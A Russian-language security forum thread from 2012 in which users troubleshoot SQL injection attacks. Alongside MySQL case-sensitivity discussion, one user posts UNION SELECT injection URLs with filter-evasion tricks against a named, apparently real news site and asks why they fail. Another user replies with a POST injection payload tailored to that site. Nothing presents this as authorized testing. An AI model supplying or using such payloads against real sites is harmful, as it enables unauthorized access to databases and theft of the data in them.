ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.01.2012, 00:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
6075
Репутация:
0
|
|
Konqi со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?
|
|
|
|
08.01.2012, 00:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от NZT
NZT said:
Konqi
со всем уважением к форуму я не могу найти ответ в гугле, я искал до и после того как задать свой ворпрос здесь и ответа не нашел. Я не знаю как мне решить проблему , можно я еще раз задам здесь свой вопрос?
смотрите имя темы, и подумайте, является ли ваш вопрос "вопросом по уязвимостям"
здесь обсуждают уязвимости, а не программы которые ищут уязвимости в гугле и тп.. это не для нашего форума
надеюсь ясно высказался..
|
|
|
08.01.2012, 00:29
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от [R
eD"]
[R]eD said:
есть скуля, все выводится и работает но посылая например такой запрос
SELECT `name` FROM `users` WHERE `user_id` = 1
сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.
вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине
попробуй
SELECT `name` FROM lower(`users`) WHERE `user_id` = 1
|
|
|
|
08.01.2012, 00:32
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от попугай
попугай said:
попробуй
SELECT `name` FROM lower(`users`) WHERE `user_id` = 1
так нарушается синтаксис и выдает ошибку.
|
|
|
|
08.01.2012, 00:36
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от [R
eD"]
[R]eD said:
так нарушается синтаксис и выдает ошибку.
SELECT `name` FROM lower('users') WHERE `user_id` = 1
возможно, так
|
|
|
|
08.01.2012, 00:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от попугай
попугай said:
SELECT `name` FROM lower('users') WHERE `user_id` = 1
возможно, так
эти функции распространяются только на элементы выборки. с именами таблиц такое не катит.
|
|
|
|
08.01.2012, 01:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Код:
Code:
http://www.pmlnjp.com/news.php?newsid=null*%00*/uni-on/**/se-lect/**/1,2,3,4,5,6,7,8,9
Код:
Code:
http://www.pmlnjp.com/news.php?newsid=null%20UNION%20SELEC%201,2,39,4,5,6,7,8,9
I cannot get vulnerable column why?
And no, I don't wanna use blind. |
|
|
|
08.01.2012, 01:54
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от lightangel
lightangel said:
Код:
Code:
http://www.pmlnjp.com/news.php?newsid=null*%00*/uni-on/**/se-lect/**/1,2,3,4,5,6,7,8,9
Код:
Code:
http://www.pmlnjp.com/news.php?newsid=null%20UNION%20SELEC%201,2,39,4,5,6,7,8,9
I cannot get vulnerable column why?
And no, I don't wanna use blind.
Код:
Code:
cmd> POST /news.php HTTP/1.0
newsid=1320+and+0+union+select+1,2,3,4,5,6,7,8,9--+
|
|
|
|
08.01.2012, 02:58
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от [R
eD"]
[R]eD said:
есть скуля, все выводится и работает но посылая например такой запрос
SELECT `name` FROM `users` WHERE `user_id` = 1
сервер переводит имя таблицы в верхний регистр (USERS)
т.к. сервер на линуксе то там по умолчанию зависит от регистра букв.
вот вопрос, как это можно обойти, никакие lower и т.п. не подходят по ясной причине
Что там по умолчанию зависит от регистра? Это не имена файлов, язык запросов от ОС не зависит.
В mysql ограничение может быть, если имя таблицы или базы встречается несколько раз в одном запросе. В этом случае можно использовать только одинаковый регистр.
верно:
Код:
Code:
SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;
неверно:
Код:
Code:
SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;
upd:
Ошибся. Все таки таблицы - это файлы
|
|
|
|
08.01.2012, 17:08
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Сообщение от M_script
M_script said:
Что там по умолчанию зависит от регистра? Это не имена файлов, язык запросов от ОС не зависит.
В mysql ограничение может быть, если имя таблицы или базы встречается несколько раз в одном запросе. В этом случае можно использовать только одинаковый регистр.
верно:
Код:
Code:
SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;
неверно:
Код:
Code:
SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;
http://dev.mysql.com/doc/refman/5.0/en/identifier-case-sensitivity.html
сервер выдает ошибку в уже верхнем регистре, т.е. еще до отправки он перевел в верхний регстр запрос
Invalid query: Table 'sqlbd1.ABC_USER' doesn't exist
abc_user 100% существует (проверял в information_schema)
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?2969821){kind=avatar}
![Аватар для [R]eD](/avatars/avatar26157.jpg?2970591){kind=avatar}
Похожие темы
Линейный вид
